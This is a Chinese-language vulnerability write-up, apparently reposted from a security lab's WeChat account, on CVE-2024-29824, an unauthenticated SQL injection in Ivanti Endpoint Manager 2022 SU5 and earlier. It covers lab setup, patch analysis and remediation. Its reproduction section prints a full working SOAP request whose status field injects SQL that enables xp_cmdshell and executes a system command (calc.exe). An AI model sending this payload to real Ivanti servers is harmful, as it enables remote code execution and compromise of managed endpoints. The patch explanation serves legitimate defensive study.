Ivanti EPM SQL注入漏洞（CVE-2024-29824）

admin

109151
文章

90
评论

2024年7月1日23:42:17评论2 views字数 1973阅读6分34秒阅读模式

0x01 简介

Ivanti Endpoint Manager (EPM) 是一款由 Ivanti 公司开发的综合性端点管理解决方案。它旨在帮助企业有效管理和保护其网络中的所有端点设备，包括桌面、笔记本电脑、服务器、移动设备和虚拟环境。

0x02 漏洞概述

漏洞编号：CVE-2024-29824

攻击者可以利用该漏洞进行未授权的 SQL 注入并可以执行系统任意代码。官方的公告中提出的是：

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Ivanti EPM 2022 SU5 及更早版本的核心服务器中存在未指定的 SQL 注入漏洞，允许同一网络内未经身份验证的攻击者执行任意代码。（此设备内网环境中使用偏多）

0x03 影响版本

version <= Ivanti EPM 2022 SU5

0x04 环境搭建

下载安装包，需要注意的是：Ivanti Endpoint Manager 需要安装 Windows Server 下。

然后一直点下一步就好了，安装过程大概需要 30 分钟左右，由于并没有许可，所以我们选择试用。

激活之后访问 https://IP 即可，这里访问首页会得到如下错误：

这个错误并不影响我们漏洞复现，因此可以不纠结这个错误。

0x05 漏洞复现

使用 BP 发送请求 Ivanti EPM SQL注入漏洞（CVE-2024-29824）

使用 Process Hacker 查看进程，可以到 calc.exe 已经在后台运行，执行命令成功。

完整数据包：

POST /WSStatusEvents/EventHandler.asmx HTTP/1.1
Host: host
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/soap+xml
Content-Length: 720

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'calc.exe'--</status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>

0x06 补丁对比

具体的分析可以看 horizon3

JetBrains dotPeek 搜索函数可以使用 Navigate->Go to Symbol... 进行搜索。

在 2022 SU5 中 RecordGoodApp 函数内容如下： Ivanti EPM SQL注入漏洞（CVE-2024-29824）

在这段代码中开发直接将用户输入与 SQL 语句通过字符串拼接在一起，最终导致了 SQL 注入并可以执行系统命令。而在补丁中：

开发者将 SQL 查询改为了参数化查询，将用户的输入作为参数传递进去，有效防止了 SQL 注入。

0x07 修复方式

更新补丁，可以在 https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US 下载该漏洞的补丁。
不要开发到公网上。

原文始发于微信公众号（合天网安实验室）：Ivanti EPM SQL注入漏洞（CVE-2024-29824）

左青龙
微信扫一扫

右白虎
微信扫一扫

Ivanti EPM SQL注入漏洞（CVE-2024-29824）

0x02 漏洞概述

0x03 影响版本

0x04 环境搭建

0x05 漏洞复现

0x06 补丁对比

0x07 修复方式

GeoServer 远程代码执行漏洞（CVE-2024-36401）

CVE-2024-4577

多客圈子论坛系统httpGet任意文件读取漏洞复现

【攻防演练】Geoserver表达式注入致远程代码执行漏洞（CVE-2024-36401）

大华智能物联综合管理平台存在env任意文件读取漏洞

智慧校园(安校易)管理系统任意文件上传漏洞

CVE-2024-36401 RCE漏洞（附EXP）

热网无线监测系统 SystemManager.asmx SQL注入漏洞

GeoServer远程代码执行漏洞-CVE-2024-36401

GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

发表评论

在线咨询

微信